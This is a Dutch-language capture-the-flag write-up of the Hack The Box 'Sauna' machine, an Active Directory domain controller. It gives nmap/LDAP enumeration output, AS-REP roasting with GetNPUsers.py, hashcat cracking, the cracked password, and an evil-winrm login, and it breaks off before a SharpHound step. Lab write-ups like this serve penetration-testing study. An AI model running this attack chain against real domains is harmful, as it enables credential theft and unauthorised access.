Zoals altijd begin ik met een nmap scan waarna ik gebaseerd op de resultaten verder onderzoek zal verrichten.
Nmap scan report for 10.10.10.175 Host is up (0.14s latency). PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Egotistical Bank :: Home 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-29 21:24:25Z) 135/tcp open msrpc Microsoft Windows RPC 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=6/29%Time=5EF9F97D%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 7h00m31s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-06-29T21:26:48 |_ start_date: N/A NSE: Script Post-scanning.
Zoals te zien is in bovenstaande resultaten zijn er een aantal ldap poorten open, mijn volgende commando was daarom ook als volgt:
nmap -v -n -sV --script="ldap*" 10.10.10.175
Het resultaat was als volgt:
Nmap scan report for 10.10.10.175 Host is up (0.080s latency). Not shown: 988 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-30 19:22:59Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name) | ldap-brute: | root:<empty> => Valid credentials | admin:<empty> => Valid credentials | administrator:<empty> => Valid credentials | webadmin:<empty> => Valid credentials | sysadmin:<empty> => Valid credentials | netadmin:<empty> => Valid credentials | guest:<empty> => Valid credentials | user:<empty> => Valid credentials | web:<empty> => Valid credentials |_ test:<empty> => Valid credentials | ldap-rootdse: | LDAP Results | <ROOT> | domainFunctionality: 7 | forestFunctionality: 7 | domainControllerFunctionality: 7 | rootDomainNamingContext: DC=EGOTISTICAL-BANK,DC=LOCAL | ldapServiceName: EGOTISTICAL-BANK.LOCAL:sauna$@EGOTISTICAL-BANK.LOCAL | isGlobalCatalogReady: TRUE | supportedSASLMechanisms: GSSAPI | supportedSASLMechanisms: GSS-SPNEGO | supportedSASLMechanisms: EXTERNAL | supportedSASLMechanisms: DIGEST-MD5 | supportedLDAPVersion: 3 | supportedLDAPVersion: 2 | supportedLDAPPolicies: MaxPoolThreads | supportedLDAPPolicies: MaxPercentDirSyncRequests | supportedLDAPPolicies: MaxDatagramRecv | supportedLDAPPolicies: MaxReceiveBuffer | supportedLDAPPolicies: InitRecvTimeout | supportedLDAPPolicies: MaxConnections | supportedLDAPPolicies: MaxConnIdleTime | supportedLDAPPolicies: MaxPageSize | supportedLDAPPolicies: MaxBatchReturnMessages | supportedLDAPPolicies: MaxQueryDuration | supportedLDAPPolicies: MaxDirSyncDuration | supportedLDAPPolicies: MaxTempTableSize | supportedLDAPPolicies: MaxResultSetSize | supportedLDAPPolicies: MinResultSets | supportedLDAPPolicies: MaxResultSetsPerConn | supportedLDAPPolicies: MaxNotificationPerConn | supportedLDAPPolicies: MaxValRange | supportedLDAPPolicies: MaxValRangeTransitive | supportedLDAPPolicies: ThreadMemoryLimit | supportedLDAPPolicies: SystemMemoryLimitPercent | supportedControl: 1.2.840.113556.1.4.319 | supportedControl: 1.2.840.113556.1.4.801 | supportedControl: 1.2.840.113556.1.4.473 | supportedControl: 1.2.840.113556.1.4.528 | supportedControl: 1.2.840.113556.1.4.417 | supportedControl: 1.2.840.113556.1.4.619 | supportedControl: 1.2.840.113556.1.4.841 | supportedControl: 1.2.840.113556.1.4.529 | supportedControl: 1.2.840.113556.1.4.805 | supportedControl: 1.2.840.113556.1.4.521 | supportedControl: 1.2.840.113556.1.4.970 | supportedControl: 1.2.840.113556.1.4.1338 | supportedControl: 1.2.840.113556.1.4.474 | supportedControl: 1.2.840.113556.1.4.1339 | supportedControl: 1.2.840.113556.1.4.1340 | supportedControl: 1.2.840.113556.1.4.1413 | supportedControl: 2.16.840.1.113730.3.4.9 | supportedControl: 2.16.840.1.113730.3.4.10 | supportedControl: 1.2.840.113556.1.4.1504 | supportedControl: 1.2.840.113556.1.4.1852 | supportedControl: 1.2.840.113556.1.4.802 | supportedControl: 1.2.840.113556.1.4.1907 | supportedControl: 1.2.840.113556.1.4.1948 | supportedControl: 1.2.840.113556.1.4.1974 | supportedControl: 1.2.840.113556.1.4.1341 | supportedControl: 1.2.840.113556.1.4.2026 | supportedControl: 1.2.840.113556.1.4.2064 | supportedControl: 1.2.840.113556.1.4.2065 | supportedControl: 1.2.840.113556.1.4.2066 | supportedControl: 1.2.840.113556.1.4.2090 | supportedControl: 1.2.840.113556.1.4.2205 | supportedControl: 1.2.840.113556.1.4.2204 | supportedControl: 1.2.840.113556.1.4.2206 | supportedControl: 1.2.840.113556.1.4.2211 | supportedControl: 1.2.840.113556.1.4.2239 | supportedControl: 1.2.840.113556.1.4.2255 | supportedControl: 1.2.840.113556.1.4.2256 | supportedControl: 1.2.840.113556.1.4.2309 | supportedControl: 1.2.840.113556.1.4.2330 | supportedControl: 1.2.840.113556.1.4.2354 | supportedCapabilities: 1.2.840.113556.1.4.800 | supportedCapabilities: 1.2.840.113556.1.4.1670 | supportedCapabilities: 1.2.840.113556.1.4.1791 | supportedCapabilities: 1.2.840.113556.1.4.1935 | supportedCapabilities: 1.2.840.113556.1.4.2080 | supportedCapabilities: 1.2.840.113556.1.4.2237 | subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | serverName: CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | schemaNamingContext: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | namingContexts: DC=EGOTISTICAL-BANK,DC=LOCAL | namingContexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | namingContexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | namingContexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL | namingContexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL | isSynchronized: TRUE | highestCommittedUSN: 53469 | dsServiceName: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | dnsHostName: SAUNA.EGOTISTICAL-BANK.LOCAL | defaultNamingContext: DC=EGOTISTICAL-BANK,DC=LOCAL | currentTime: 20200630192519.0Z |_ configurationNamingContext: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | ldap-search: | Context: DC=EGOTISTICAL-BANK,DC=LOCAL | dn: DC=EGOTISTICAL-BANK,DC=LOCAL | objectClass: top | objectClass: domain | objectClass: domainDNS | distinguishedName: DC=EGOTISTICAL-BANK,DC=LOCAL | instanceType: 5 | whenCreated: 2020/01/23 05:44:25 UTC | whenChanged: 2020/06/29 05:00:54 UTC | subRefs: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL | subRefs: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL | subRefs: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | uSNCreated: 4099 | dSASignature: \x01\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\xBE\xE0\xB3\xC6%\xECD\xB2\xB9\x9F\xF8\D\xB2\xEC | uSNChanged: 53269 | name: EGOTISTICAL-BANK | objectGUID: 504e6ec-c122-a143-93c0-cf487f83363 | replUpToDateVector: \x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xFDZ\x85\x92F\xDE^A\xAAVnj@#\xF6\x0C\x0B\xD0\x00\x00\x00\x00\x00\x00\x85\x06 | \x15\x03\x00\x00\x00@\xBE\xE0\xB3\xC6%\xECD\xB2\xB9\x9F\xF8\D\xB2\xEC \xB0\x00\x00\x00\x00\x00\x00\xD4\x04R\x14\x03\x00\x00\x00 | creationTime: 132378804547498566 | forceLogoff: -9223372036854775808 | lockoutDuration: -18000000000 | lockOutObservationWindow: -18000000000 | lockoutThreshold: 0 | maxPwdAge: -36288000000000 | minPwdAge: -864000000000 | minPwdLength: 7 | modifiedCountAtLastProm: 0 | nextRid: 1000 | pwdProperties: 1 | pwdHistoryLength: 24 | objectSid: 1-5-21-2966785786-3096785034-1186376766 | serverState: 1 | uASCompat: 1 | modifiedCount: 1 | auditingPolicy: \x00\x01 | nTMixedDomain: 0 | rIDManagerReference: CN=RID Manager$,CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL | fSMORoleOwner: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | systemFlags: -1946157056 | wellKnownObjects: B:32:6227F0AF1FC2410D8E3BB10615BB5B0F:CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL | wellKnownObjects: B:32:F4BE92A4C777485E878E9421D53087DB:CN=Microsoft,CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL | wellKnownObjects: B:32:09460C08AE1E4A4EA0F64AEE7DAA1E5A:CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL | wellKnownObjects: B:32:22B70C67D56E4EFB91E9300FCA3DC1AA:CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL | wellKnownObjects: B:32:18E2EA80684F11D2B9AA00C04F79F805:CN=Deleted Objects,DC=EGOTISTICAL-BANK,DC=LOCAL | wellKnownObjects: B:32:2FBAC1870ADE11D297C400C04FD8D5CD:CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL | wellKnownObjects: B:32:AB8153B7768811D1ADED00C04FD8D5CD:CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL | wellKnownObjects: B:32:AB1D30F3768811D1ADED00C04FD8D5CD:CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL | wellKnownObjects: B:32:A361B2FFFFD211D1AA4B00C04FD7D83A:OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL | wellKnownObjects: B:32:AA312825768811D1ADED00C04FD8D5CD:CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL | wellKnownObjects: B:32:A9D1CA15768811D1ADED00C04FD8D5CD:CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL | objectCategory: CN=Domain-DNS,CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | isCriticalSystemObject: TRUE | gPLink: [LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL;0] | dSCorePropagationData: 1601/01/01 00:00:00 UTC | otherWellKnownObjects: B:32:683A24E2E8164BD3AF86AC3C2CF3F981:CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL | otherWellKnownObjects: B:32:1EB93889E40C45DF9F0C64D23BBB6237:CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL | masteredBy: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | ms-DS-MachineAccountQuota: 10 | msDS-Behavior-Version: 7 | msDS-PerUserTrustQuota: 1 | msDS-AllUsersTrustQuota: 1000 | msDS-PerUserTrustTombstonesQuota: 10 | msDs-masteredBy: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | msDS-IsDomainFor: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | msDS-NcType: 0 | msDS-ExpirePasswordsOnSmartCardOnlyAccounts: TRUE | dc: EGOTISTICAL-BANK | dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL |_ dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name) | ldap-brute: | root:<empty> => Valid credentials | admin:<empty> => Valid credentials | administrator:<empty> => Valid credentials | webadmin:<empty> => Valid credentials | sysadmin:<empty> => Valid credentials | netadmin:<empty> => Valid credentials | guest:<empty> => Valid credentials | user:<empty> => Valid credentials | web:<empty> => Valid credentials |_ test:<empty> => Valid credentials | ldap-rootdse: | LDAP Results | <ROOT> | domainFunctionality: 7 | forestFunctionality: 7 | domainControllerFunctionality: 7 | rootDomainNamingContext: DC=EGOTISTICAL-BANK,DC=LOCAL | ldapServiceName: EGOTISTICAL-BANK.LOCAL:sauna$@EGOTISTICAL-BANK.LOCAL | isGlobalCatalogReady: TRUE | supportedSASLMechanisms: GSSAPI | supportedSASLMechanisms: GSS-SPNEGO | supportedSASLMechanisms: EXTERNAL | supportedSASLMechanisms: DIGEST-MD5 | supportedLDAPVersion: 3 | supportedLDAPVersion: 2 | supportedLDAPPolicies: MaxPoolThreads | supportedLDAPPolicies: MaxPercentDirSyncRequests | supportedLDAPPolicies: MaxDatagramRecv | supportedLDAPPolicies: MaxReceiveBuffer | supportedLDAPPolicies: InitRecvTimeout | supportedLDAPPolicies: MaxConnections | supportedLDAPPolicies: MaxConnIdleTime | supportedLDAPPolicies: MaxPageSize | supportedLDAPPolicies: MaxBatchReturnMessages | supportedLDAPPolicies: MaxQueryDuration | supportedLDAPPolicies: MaxDirSyncDuration | supportedLDAPPolicies: MaxTempTableSize | supportedLDAPPolicies: MaxResultSetSize | supportedLDAPPolicies: MinResultSets | supportedLDAPPolicies: MaxResultSetsPerConn | supportedLDAPPolicies: MaxNotificationPerConn | supportedLDAPPolicies: MaxValRange | supportedLDAPPolicies: MaxValRangeTransitive | supportedLDAPPolicies: ThreadMemoryLimit | supportedLDAPPolicies: SystemMemoryLimitPercent | supportedControl: 1.2.840.113556.1.4.319 | supportedControl: 1.2.840.113556.1.4.801 | supportedControl: 1.2.840.113556.1.4.473 | supportedControl: 1.2.840.113556.1.4.528 | supportedControl: 1.2.840.113556.1.4.417 | supportedControl: 1.2.840.113556.1.4.619 | supportedControl: 1.2.840.113556.1.4.841 | supportedControl: 1.2.840.113556.1.4.529 | supportedControl: 1.2.840.113556.1.4.805 | supportedControl: 1.2.840.113556.1.4.521 | supportedControl: 1.2.840.113556.1.4.970 | supportedControl: 1.2.840.113556.1.4.1338 | supportedControl: 1.2.840.113556.1.4.474 | supportedControl: 1.2.840.113556.1.4.1339 | supportedControl: 1.2.840.113556.1.4.1340 | supportedControl: 1.2.840.113556.1.4.1413 | supportedControl: 2.16.840.1.113730.3.4.9 | supportedControl: 2.16.840.1.113730.3.4.10 | supportedControl: 1.2.840.113556.1.4.1504 | supportedControl: 1.2.840.113556.1.4.1852 | supportedControl: 1.2.840.113556.1.4.802 | supportedControl: 1.2.840.113556.1.4.1907 | supportedControl: 1.2.840.113556.1.4.1948 | supportedControl: 1.2.840.113556.1.4.1974 | supportedControl: 1.2.840.113556.1.4.1341 | supportedControl: 1.2.840.113556.1.4.2026 | supportedControl: 1.2.840.113556.1.4.2064 | supportedControl: 1.2.840.113556.1.4.2065 | supportedControl: 1.2.840.113556.1.4.2066 | supportedControl: 1.2.840.113556.1.4.2090 | supportedControl: 1.2.840.113556.1.4.2205 | supportedControl: 1.2.840.113556.1.4.2204 | supportedControl: 1.2.840.113556.1.4.2206 | supportedControl: 1.2.840.113556.1.4.2211 | supportedControl: 1.2.840.113556.1.4.2239 | supportedControl: 1.2.840.113556.1.4.2255 | supportedControl: 1.2.840.113556.1.4.2256 | supportedControl: 1.2.840.113556.1.4.2309 | supportedControl: 1.2.840.113556.1.4.2330 | supportedControl: 1.2.840.113556.1.4.2354 | supportedCapabilities: 1.2.840.113556.1.4.800 | supportedCapabilities: 1.2.840.113556.1.4.1670 | supportedCapabilities: 1.2.840.113556.1.4.1791 | supportedCapabilities: 1.2.840.113556.1.4.1935 | supportedCapabilities: 1.2.840.113556.1.4.2080 | supportedCapabilities: 1.2.840.113556.1.4.2237 | subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | serverName: CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | schemaNamingContext: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | namingContexts: DC=EGOTISTICAL-BANK,DC=LOCAL | namingContexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | namingContexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | namingContexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL | namingContexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL | isSynchronized: TRUE | highestCommittedUSN: 53469 | dsServiceName: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | dnsHostName: SAUNA.EGOTISTICAL-BANK.LOCAL | defaultNamingContext: DC=EGOTISTICAL-BANK,DC=LOCAL | currentTime: 20200630192519.0Z |_ configurationNamingContext: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | ldap-search: | Context: DC=EGOTISTICAL-BANK,DC=LOCAL | dn: DC=EGOTISTICAL-BANK,DC=LOCAL | objectClass: top | objectClass: domain | objectClass: domainDNS | distinguishedName: DC=EGOTISTICAL-BANK,DC=LOCAL | instanceType: 5 | whenCreated: 2020/01/23 05:44:25 UTC | whenChanged: 2020/06/29 05:00:54 UTC | subRefs: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL | subRefs: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL | subRefs: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | uSNCreated: 4099 | uSNChanged: 53269 | name: EGOTISTICAL-BANK | objectGUID: 504e6ec-c122-a143-93c0-cf487f83363 | replUpToDateVector: \x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xFDZ\x85\x92F\xDE^A\xAAVnj@#\xF6\x0C\x0B\xD0\x00\x00\x00\x00\x00\x00\x85\x06 | \x15\x03\x00\x00\x00@\xBE\xE0\xB3\xC6%\xECD\xB2\xB9\x9F\xF8\D\xB2\xEC \xB0\x00\x00\x00\x00\x00\x00\xD4\x04R\x14\x03\x00\x00\x00 | objectSid: 1-5-21-2966785786-3096785034-1186376766 | wellKnownObjects: B:32:6227F0AF1FC2410D8E3BB10615BB5B0F:CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL | wellKnownObjects: B:32:F4BE92A4C777485E878E9421D53087DB:CN=Microsoft,CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL | wellKnownObjects: B:32:09460C08AE1E4A4EA0F64AEE7DAA1E5A:CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL | wellKnownObjects: B:32:22B70C67D56E4EFB91E9300FCA3DC1AA:CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL | wellKnownObjects: B:32:18E2EA80684F11D2B9AA00C04F79F805:CN=Deleted Objects,DC=EGOTISTICAL-BANK,DC=LOCAL | wellKnownObjects: B:32:2FBAC1870ADE11D297C400C04FD8D5CD:CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL | wellKnownObjects: B:32:AB8153B7768811D1ADED00C04FD8D5CD:CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL | wellKnownObjects: B:32:AB1D30F3768811D1ADED00C04FD8D5CD:CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL | wellKnownObjects: B:32:A361B2FFFFD211D1AA4B00C04FD7D83A:OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL | wellKnownObjects: B:32:AA312825768811D1ADED00C04FD8D5CD:CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL | wellKnownObjects: B:32:A9D1CA15768811D1ADED00C04FD8D5CD:CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL | objectCategory: CN=Domain-DNS,CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | gPLink: [LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL;0] | dSCorePropagationData: 1601/01/01 00:00:00 UTC | masteredBy: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | msDs-masteredBy: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | msDS-IsDomainFor: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | dc: EGOTISTICAL-BANK | dn: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL |_ dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL 3269/tcp open tcpwrapped 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=6/30%Time=5EFB2E7A%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Okee, mooi we hebben wat informatie weten te achterhalen zoals dat wij te maken hebben met een domain controller.

Mijn volgende stap was om te achterhalen welke gebruikers er aanwezig waren en welke niet met behulp van GetNPUsers.py maar ik moet dan wel een lijst hebben met gebruikersnamen. Toen kwam de webserver van pas, op de webserver was er een about pagina waar namen aanwezig waren.

Met behulp van bovenstaande afbeelding heb ik een lijst gemaakt met gebruikersnamen zoals hieronder te zien is:
hsmith fsmith Fergus Smith Fergus.s Fergus.S F Smith F smith f Smith f smith fsmith Shaun Coins S.Coins s.Coins Shaun.C Shaun.c s.coins scoins Scoins SCoins s.Coins S.COins Hugo Bear H Bear H bear h bear h Bear hbear hBear HBear H.B h.b H.b h.B Steven Kerb skerb Skerb SKerb S.Kerb S.kerb S Kerb S kerb s.kerb S.kerb S.Kerb F smith f smith f.smith F.smith F Smith F.Smith Hugo smith H Smith H smith Hugo s Hugo S H S h s H s h S Hugo Smith H.Smith H.smith h.Smith h.smith Hugo.s Hugo.S hugo.s hugo.S Johnson johnson Watson watson Admin admin James Doe james doe James.D James.d james.D james.d James D james d james D Jenny Joy Jenny j Jenny J jenny J jenny j j.Joy J.Joy j.jenny J.Jenny J.D j.doe j.Doe J.doe J.Doe john John Wat wat
Nadat ik een lijst gemaakt had met gebruikersnamen heb ik de volgende commando uitgevoerd:
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile /root/Documents/htb/sauna/users.txt -format hashcat -outputfile ashesh.asreproast
Zoals te zien is in onderstaande afbeelding was er een gebruikersnaam dat inderdaad werkten.

Na het bekijken van de outputfile ‘ashesh.asreproast’ hadden wij de volgende hash:
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:e717bd92c7dab4146dbdebf06eb36487$a06f577f82ef1019463c690ba22cce44fabd2a13c985a1e5f3c6276d024402ae3fc630a7ab88d1d10139e982d32997885c40936c0dfe23ce236686dfefd41446dda422e65dc1018285ad3ebea9bbdbde69fc6dc1a2d9df70a4fe89217eca9cb5765c22404a1edcb79b58a1c973da06ff805deed3806377ad5bca289a23bc9f35460017e7c78ab4d4f9fb5d8b3da5c46af7e520e9876292aad0dbbb7047b502dbfe7e4a36c3c8a40dc7a43344e31ca80a666d1bdfb1ec9b9d2251a46cb7e5722364185b65f237f0a02e0ef1f4d767a36c08b4268d6e795c92b37431b90da6c8a87a2dae156bc8e42b346c5a2bbddd8f65a0849121428517a337fcb02688509f9b $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:b99a2265c2ae859eccd73b8781b0356a$4e721d4bad1820b599654ef8bc367bfbaef3c79f39cf9354e2f4d32349036f98317d098e67840945727c37d19fc8a7d876f997305245132847b5968781fd46567b2885c61d0cff1f69500469bb33fc35333dbb2d1dddc60677daa3370f68088c3356b31580628fbadca5bb1872f505f6fc9f26a07adaf11e6dffec9c37071a570a64ce99a1c0416e4880f416a85de3eb5d2fef28fdae8e6f770b129eac2225ea2c72c30405b28a97d113bc7ac5a7d9c3467fa88f6a346cb48ca80673de62147ad40770a56c61da0c149e61f2ddbc1f54875890702a9fc8694c5e8b2492f36209ecdf12ae6bd23a1b8a18c59bb2997b40fece8069e96f4f2ba7b714ce0141e008
Volgende stap was om de hash te gaan kraken met behulp van hashcat, hier heb ik de volgende commando voor gebruikt:
hashcat -m 18200 ashesh.asreproast /usr/share/wordlists/rockyou.txt/rockyou.txt

Na een aantal seconden was de hash gekraakt en hadden wij de eerste gebruiker gegevens gevonden namelijk fsmith:Thestrokes23. Nu heb ik een geldig account gevonden en ga ik proberen om in te loggen met behulp van evil-winrm. Zie volgende commando:
evil-winrm -u fsmith -p 'Thestrokes23' -i 10.10.10.175

De volgende stap was om WinPEAS.exe te runnen op het systeem om meer informatie te verkrijgen over het systeem en wat voor mogelijkheden ik heb om naar te kijken voor een mogelijke privilege escalatie. Uiteindelijk had ik nog een set van gebruiker gegevens gevonden.

De volgende stap was om te kijken wat deze nieuwe gebruiker precies kan doen op onze doelwit, hiervoor heb ik gebruik gemaakt van SharpHound.ps, ik heb met behulp van de volgende commando deze script uitgevoerd:
